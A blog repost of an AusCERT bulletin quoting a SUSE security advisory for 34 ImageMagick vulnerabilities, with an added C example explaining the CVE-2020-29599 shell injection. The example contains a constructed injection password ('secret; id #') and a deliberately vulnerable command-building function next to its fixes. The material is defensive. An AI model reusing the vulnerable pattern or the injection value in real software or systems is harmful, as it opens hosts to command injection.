  o https://bugzilla.suse.com/1179339
  o https://bugzilla.suse.com/1179345
  o https://bugzilla.suse.com/1179346
  o https://bugzilla.suse.com/1179347
  o https://bugzilla.suse.com/1179397

--------------------------------------------------------------------------------

SUSE Security Update: Security update for ImageMagick

______________________________________________________________________________

Announcement ID:   SUSE-SU-2021:0153-1
Rating:            moderate
References:        #1179202 #1179208 #1179212 #1179221 #1179223 #1179240
                   #1179244 #1179260 #1179268 #1179269 #1179276 #1179278
                   #1179281 #1179285 #1179311 #1179312 #1179313 #1179315
                   #1179317 #1179321 #1179322 #1179327 #1179333 #1179336
                   #1179338 #1179339 #1179343 #1179345 #1179346 #1179347
                   #1179361 #1179362 #1179397 #1179753
Cross-References:  CVE-2020-25664 CVE-2020-25665 CVE-2020-25666 CVE-2020-25674
                   CVE-2020-25675 CVE-2020-25676 CVE-2020-27750 CVE-2020-27751
                   CVE-2020-27752 CVE-2020-27753 CVE-2020-27754 CVE-2020-27755
                   CVE-2020-27756 CVE-2020-27757 CVE-2020-27758 CVE-2020-27759
                   CVE-2020-27760 CVE-2020-27761 CVE-2020-27762 CVE-2020-27763
                   CVE-2020-27764 CVE-2020-27765 CVE-2020-27766 CVE-2020-27767
                   CVE-2020-27768 CVE-2020-27769 CVE-2020-27770 CVE-2020-27771
                   CVE-2020-27772 CVE-2020-27773 CVE-2020-27774 CVE-2020-27775
                   CVE-2020-27776 CVE-2020-29599
Affected Products:
                   SUSE Linux Enterprise Module for Development Tools 15-SP2
                   SUSE Linux Enterprise Module for Desktop Applications 15-SP2
______________________________________________________________________________

An update that fixes 34 vulnerabilities is now available.

Description:

This update for ImageMagick fixes the following issues:

  o CVE-2020-25664: Fixed a heap-based buffer overflow in PopShortPixel
    (bsc#1179202).
  o CVE-2020-25665: Fixed a heap-based buffer overflow in WritePALMImage
    (bsc#1179208).
  o CVE-2020-25666: Fixed a conversion to a value outside the range
    representable by type 'int' and a signed integer overflow (bsc#1179212).
  o CVE-2020-25674: Fixed a heap-based buffer overflow in WriteOnePNGImage
    (bsc#1179223).
  o CVE-2020-25675: Fixed a conversion to a value outside the range
    representable by type 'long' and an integer overflow (bsc#1179240).
  o CVE-2020-25676: Fixed a conversion to a value outside the range
    representable by type 'long' and an integer overflow at MagickCore/pixel.c
    (bsc#1179244).
  o CVE-2020-27750: Fixed a division by zero in MagickCore/colorspace-private.h
    (bsc#1179260).
  o CVE-2020-27751: Fixed an integer overflow in MagickCore/quantum-export.c
    (bsc#1179269).
  o CVE-2020-27752: Fixed a heap-based buffer overflow in PopShortPixel in
    MagickCore/quantum-private.h (bsc#1179346).
  o CVE-2020-27753: Fixed memory leaks in the AcquireMagickMemory function
    (bsc#1179397).
  o CVE-2020-27755: Fixed memory leaks in the ResizeMagickMemory function in
    MagickCore/memory.c (bsc#1179345).
  o CVE-2020-27756: Fixed a division by zero at MagickCore/geometry.c
    (bsc#1179221).
  o CVE-2020-27757: Fixed a conversion to a value outside the range
    representable by type 'unsigned long long' at MagickCore/quantum-private.h
    (bsc#1179268).
  o CVE-2020-27758: Fixed a conversion to a value outside the range
    representable by type 'unsigned long long' (bsc#1179276).
  o CVE-2020-27759: Fixed a conversion to a value outside the range
    representable by type 'int' at MagickCore/quantize.c (bsc#1179313).
  o CVE-2020-27760: Fixed a division by zero at MagickCore/enhance.c
    (bsc#1179281).
  o CVE-2020-27761: Fixed a conversion to a value outside the range
    representable by type 'unsigned long' at coders/palm.c (bsc#1179315).
  o CVE-2020-27762: Fixed a conversion to a value outside the range
    representable by type 'unsigned char' (bsc#1179278).
  o CVE-2020-27763: Fixed a division by zero at MagickCore/resize.c
    (bsc#1179312).
  o CVE-2020-27764: Fixed a conversion to a value outside the range
    representable by type 'unsigned long' at MagickCore/statistic.c
    (bsc#1179317).
  o CVE-2020-27765: Fixed a division by zero at MagickCore/segment.c
    (bsc#1179311).
  o CVE-2020-27766: Fixed a conversion to a value outside the range
    representable by type 'unsigned long' at MagickCore/statistic.c
    (bsc#1179361).
  o CVE-2020-27767: Fixed a conversion to a value outside the range
    representable by type 'float' at MagickCore/quantum.h (bsc#1179322).
  o CVE-2020-27768: Fixed a conversion to a value outside the range
    representable by type 'unsigned int' at MagickCore/quantum-private.h
    (bsc#1179339).
  o CVE-2020-27769: Fixed a conversion to a value outside the range
    representable by type 'float' at MagickCore/quantize.c (bsc#1179321).
  o CVE-2020-27770: Fixed an unsigned offset overflow at MagickCore/string.c
    (bsc#1179343).
  o CVE-2020-27771: Fixed a conversion to a value outside the range
    representable by type 'unsigned char' at coders/pdf.c (bsc#1179327).
  o CVE-2020-27772: Fixed a conversion to a value outside the range
    representable by type 'unsigned int' at coders/bmp.c (bsc#1179347).
  o CVE-2020-27773: Fixed a division by zero at MagickCore/gem-private.h
    (bsc#1179285).
  o CVE-2020-27774: Fixed an integer overflow at MagickCore/statistic.c
    (bsc#1179333).
  o CVE-2020-27775: Fixed a conversion to a value outside the range
    representable by type 'unsigned char' at MagickCore/quantum.h
    (bsc#1179338).
  o CVE-2020-27776: Fixed a conversion to a value outside the range
    representable by type 'unsigned long' at MagickCore/statistic.c
    (bsc#1179362).
  o CVE-2020-29599: Fixed a shell command injection via the -authenticate
    option: the user-supplied PDF password was passed unsanitized into the
    delegate command line (bsc#1179753).
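CVE-2020-29599 is a different class from the rest of the list: the value of the -authenticate option (the PDF password) was spliced into the Ghostscript delegate command line, which ImageMagick executes through a shell, so shell metacharacters in the password were interpreted as further commands. The block below is an added example written for this page, not ImageMagick's code: the gs command line, the allowlist, the helper names and the constructed password are my own assumptions. It shows the string-splicing pattern beside two mitigations: an allowlist sanitizer (my reimplementation of the idea behind the upstream fix, not its code), and composing the delegate call as an argv vector spawned without a shell, which removes the injection surface entirely.

```c
#include <ctype.h>
#include <spawn.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/* The vulnerable shape (never do this): the caller-controlled password is
 * formatted into one command string that is later handed to /bin/sh through
 * system() or popen().  A ';' or '`' in the password ends the gs command and
 * starts another.  The gs flags are an assumed delegate line, not the
 * project's delegates.xml entry. */
static int build_delegate_command_unsafe(char *buf, size_t len,
                                         const char *password,
                                         const char *input_pdf) {
    return snprintf(buf, len,
                    "gs -q -dSAFER -dBATCH -dNOPAUSE -sDEVICE=ppmraw "
                    "-sPDFPassword=%s -sOutputFile=- %s", password, input_pdf);
}

/* Mitigation 1, allowlist sanitizer: every byte outside alphanumerics and a
 * small set of harmless punctuation becomes '_', so the string can no longer
 * end a word, start a command, redirect or substitute.  Returns how many bytes
 * were replaced, so the caller can log that the value was altered. */
static size_t sanitize_delegate_string(char *s) {
    static const char allowed[] = "@.-_:/=";
    size_t replaced = 0;
    for (; *s != '\0'; s++) {
        unsigned char c = (unsigned char) *s;
        if (!isalnum(c) && strchr(allowed, c) == NULL) {
            *s = '_';
            replaced++;
        }
    }
    return replaced;
}

/* Mitigation 2, no shell at all: the delegate is an argv vector and is
 * spawned directly.  The password is one argument whatever it contains, so
 * there is nothing to inject into; the sanitizer above remains defence in
 * depth for delegates that genuinely must go through a shell. */
#define DELEGATE_ARGV_LEN 10
static void build_delegate_argv(char *argv[DELEGATE_ARGV_LEN], char *pw_arg,
                                size_t pw_len, const char *password,
                                const char *input_pdf) {
    snprintf(pw_arg, pw_len, "-sPDFPassword=%s", password);
    argv[0] = "gs";
    argv[1] = "-q";
    argv[2] = "-dSAFER";
    argv[3] = "-dBATCH";
    argv[4] = "-dNOPAUSE";
    argv[5] = "-sDEVICE=ppmraw";
    argv[6] = pw_arg;
    argv[7] = "-sOutputFile=-";
    argv[8] = (char *) input_pdf;
    argv[9] = NULL;
}

/* Spawns argv[0] via PATH lookup and returns its exit status, or -1 if it
 * could not be started (for instance when gs is not installed). */
static int run_delegate(char *const argv[]) {
    pid_t pid;
    int status;
    if (posix_spawnp(&pid, argv[0], NULL, NULL, argv, environ) != 0)
        return -1;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed hostile password: the ';' would end the gs command. */
    char password[] = "secret; id #";
    char cmd[256], pw_arg[128];
    char *argv[DELEGATE_ARGV_LEN];
    size_t replaced;

    build_delegate_command_unsafe(cmd, sizeof cmd, password, "in.pdf");
    printf("unsafe command string: %s\n", cmd);

    build_delegate_argv(argv, pw_arg, sizeof pw_arg, password, "in.pdf");
    printf("argv[6] as a single argument: \"%s\"\n", argv[6]);
    printf("gs exit status (-1 if not installed): %d\n", run_delegate(argv));

    replaced = sanitize_delegate_string(password);
    printf("sanitized: %zu bytes replaced -> %s\n", replaced, password);
    return 0;
}
```

The argv approach is the structural fix: once no shell parses the command, quoting bugs cannot recur for this delegate. Where the delegate mechanism is configuration-driven and still shells out, the sanitizer is the minimum, and it should be applied to every user-controlled value that reaches the delegate line, not only the password.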

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

  o SUSE Linux Enterprise Module for Development Tools 15-SP2:
    zypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP2-2021-153=1
  o SUSE Linux Enterprise Module for Desktop Applications 15-SP2:
    zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-SP2-2021-153=1

Package List:

  o SUSE Linux Enterprise Module for Development Tools 15-SP2 (aarch64 ppc64le
    s390x x86_64):
       ImageMagick-debuginfo-7.0.7.34-10.9.1
       ImageMagick-debugsource-7.0.7.34-10.9.1
       perl-PerlMagick-7.0.7.34-10.9.1
       perl-PerlMagick-debuginfo-7.0.7.34-10.9.1
  o SUSE Linux Enterprise Module for Desktop Applications 15-SP2 (aarch64
    ppc64le s390x x86_64):
       ImageMagick-7.0.7.34-10.9.1
       ImageMagick-config-7-SUSE-7.0.7.34-10.9.1
       ImageMagick-config-7-upstream-7.0.7.34-10.9.1
       ImageMagick-debuginfo-7.0.7.34-10.9.1
       ImageMagick-debugsource-7.0.7.34-10.9.1
       ImageMagick-devel-7.0.7.34-10.9.1
       libMagick++-7_Q16HDRI4-7.0.7.34-10.9.1
       libMagick++-7_Q16HDRI4-debuginfo-7.0.7.34-10.9.1
       libMagick++-devel-7.0.7.34-10.9.1
       libMagickCore-7_Q16HDRI6-7.0.7.34-10.9.1
       libMagickCore-7_Q16HDRI6-debuginfo-7.0.7.34-10.9.1
       libMagickWand-7_Q16HDRI6-7.0.7.34-10.9.1
       libMagickWand-7_Q16HDRI6-debuginfo-7.0.7.34-10.9.1


References:

  o https://www.suse.com/security/cve/CVE-2020-25664.html
  o https://www.suse.com/security/cve/CVE-2020-25665.html
  o https://www.suse.com/security/cve/CVE-2020-25666.html
  o https://www.suse.com/security/cve/CVE-2020-25674.html
  o https://www.suse.com/security/cve/CVE-2020-25675.html
  o https://www.suse.com/security/cve/CVE-2020-25676.html
  o https://www.suse.com/security/cve/CVE-2020-27750.html
  o https://www.suse.com/security/cve/CVE-2020-27751.html
  o https://www.suse.com/security/cve/CVE-2020-27752.html
  o https://www.suse.com/security/cve/CVE-2020-27753.html
  o https://www.suse.com/security/cve/CVE-2020-27754.html
  o https://www.suse.com/security/cve/CVE-2020-27755.html
  o https://www.suse.com/security/cve/CVE-2020-27756.html
  o https://www.suse.com/security/cve/CVE-2020-27757.html
  o https://www.suse.com/security/cve/CVE-2020-27758.html
  o https://www.suse.com/security/cve/CVE-2020-27759.html
  o https://www.suse.com/security/cve/CVE-2020-27760.html
  o https://www.suse.com/security/cve/CVE-2020-27761.html
  o https://www.suse.com/security/cve/CVE-2020-27762.html
  o https://www.suse.com/security/cve/CVE-2020-27763.html
  o https://www.suse.com/security/cve/CVE-2020-27764.html
  o https://www.suse.com/security/cve/CVE-2020-27765.html
  o https://www.suse.com/security/cve/CVE-2020-27766.html
  o https://www.suse.com/security/cve/CVE-2020-27767.html
  o https://www.suse.com/security/cve/CVE-2020-27768.html
  o https://www.suse.com/security/cve/CVE-2020-27769.html
  o https://www.suse.com/security/cve/CVE-2020-27770.html
  o https://www.suse.com/security/cve/CVE-2020-27771.html
  o https://www.suse.com/security/cve/CVE-2020-27772.html
  o https://www.suse.com/security/cve/CVE-2020-27773.html
  o https://www.suse.com/security/cve/CVE-2020-27774.html
  o https://www.suse.com/security/cve/CVE-2020-27775.html
  o https://www.suse.com/security/cve/CVE-2020-27776.html
  o https://www.suse.com/security/cve/CVE-2020-29599.html
  o https://bugzilla.suse.com/1179202
  o https://bugzilla.suse.com/1179208
  o https://bugzilla.suse.com/1179212
  o https://bugzilla.suse.com/1179221
  o https://bugzilla.suse.com/1179223
  o https://bugzilla.suse.com/1179240
  o https://bugzilla.suse.com/1179244
  o https://bugzilla.suse.com/1179260
  o https://bugzilla.suse.com/1179268
  o https://bugzilla.suse.com/1179269
  o https://bugzilla.suse.com/1179276
  o https://bugzilla.suse.com/1179278
  o https://bugzilla.suse.com/1179281
  o https://bugzilla.suse.com/1179285
  o https://bugzilla.suse.com/1179311
  o https://bugzilla.suse.com/1179312
  o https://bugzilla.suse.com/1179313
  o https://bugzilla.suse.com/1179315
  o https://bugzilla.suse.com/1179317
  o https://bugzilla.suse.com/1179321
  o https://bugzilla.suse.com/1179322
  o https://bugzilla.suse.com/1179327
  o https://bugzilla.suse.com/1179333
  o https://bugzilla.suse.com/1179336
  o https://bugzilla.suse.com/1179338
  o https://bugzilla.suse.com/1179339
  o https://bugzilla.suse.com/1179343
  o https://bugzilla.suse.com/1179345
  o https://bugzilla.suse.com/1179346
  o https://bugzilla.suse.com/1179347
  o https://bugzilla.suse.com/1179361
  o https://bugzilla.suse.com/1179362
  o https://bugzilla.suse.com/1179397
  o https://bugzilla.suse.com/1179753

--------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================


The post ESB-2021.0205 – [SUSE] ImageMagick: Multiple vulnerabilities appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/esb-2021-0205-suse-imagemagick-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-0205-suse-imagemagick-multiple-vulnerabilities

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...